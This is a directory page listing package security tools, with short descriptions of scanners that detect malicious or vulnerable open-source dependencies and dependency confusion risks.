Package Security
Browse 14 package security tools
FEATURED
Detects and blocks malicious/vulnerable open source packages in supply chains.
Database for researching & tracking open source components with safety scores.
Tool for searching, comparing, and evaluating open source dependencies.
Malware-resistant software libraries rebuilt from source for multiple languages
Software supply chain security platform detecting malware in dependencies
Detects malicious open-source packages across SDLC using 410K+ package database
Software supply chain security platform with SCA, package firewall & threat intel
OpenSCA Project is a dependency security scanner that runs in the browser.
A security tool that detects potential Dependency Confusion attack vectors by identifying private package names that are not reserved on public registries.
A dependency security analysis tool that identifies potential risks in project dependencies including unsafe lock files, installation scripts, obfuscated code, and dangerous shell commands.
A Python script that scans Nexus Repository Manager for artifacts with identical names across repositories to identify dependency confusion attack vulnerabilities.
GuardDog is a CLI tool that identifies malicious PyPI and npm packages using heuristics-based analysis of source code and metadata.
npm-zoo is a curated database of known malicious NPM packages that helps developers and security researchers identify and avoid potentially harmful dependencies in their projects.
